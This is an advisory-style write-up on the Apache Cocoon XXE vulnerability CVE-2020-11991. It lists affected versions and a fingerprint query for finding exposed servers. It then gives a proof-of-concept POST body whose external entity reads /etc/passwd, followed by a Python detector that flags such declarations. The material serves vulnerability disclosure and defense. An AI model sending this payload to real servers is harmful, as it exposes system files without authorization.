
Apache Cocoon XML Injection CVE-2020-11991

Vulnerability Description

On September 11, the Apache Software Foundation issued a security announcement fixing an XML external entity (XXE) injection vulnerability in Apache Cocoon (CVE-2020-11991).

Apache Cocoon is a Spring-based framework built around the concept of separation of concerns. All processing in the framework is linearly connected by predefined processing components, so inputs and generated outputs are processed in pipeline order.

Affected Versions

Apache Cocoon <= 2.1.12

Network surveying and mapping

app="Apache-Cocoon"

Vulnerability Reproduction

Verify POC

POST /v2/api/product/manger/getInfo

<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&ent;</lastName>
</userInfo>
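
A detection-side check for the request shape shown above, as an added example that is not part of the original post: it parses a request body with Python's expat binding and lists every external entity the DTD declares, without resolving any of them. The helper name `find_external_entities` and the benign sample body are assumptions made for this example; the first sample is the PoC body from this page.

```python
import xml.parsers.expat

# Request body from the PoC on this page (used here only as detector input).
POC_BODY = b"""<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&ent;</lastName>
</userInfo>"""

# Constructed benign body for comparison.
BENIGN_BODY = b"<userInfo><firstName>John</firstName><lastName>Doe</lastName></userInfo>"


def find_external_entities(body):
    """Return (name, system_id, public_id) for each external entity declared.

    Hypothetical helper for this example. No ExternalEntityRefHandler is
    installed, so expat reports declarations but never fetches anything.
    """
    found = []

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # Internal entities have a literal value; external ones have
        # value None and a SYSTEM (optionally PUBLIC) identifier.
        if value is None and system_id is not None:
            prefix = "%" if is_param else "&"
            found.append((prefix + name, system_id, public_id))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    try:
        parser.Parse(body, True)
    except xml.parsers.expat.ExpatError:
        pass  # malformed document: keep what was declared before the error
    return found


if __name__ == "__main__":
    for label, body in (("poc", POC_BODY), ("benign", BENIGN_BODY)):
        hits = find_external_entities(body)
        print(label, "FLAG" if hits else "ok", hits)
```

Because the check reads the DTD declarations rather than matching on strings, it is not affected by whitespace or quoting variations in the `<!ENTITY ...>` line.
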
This post is licensed under CC BY 4.0 by the author.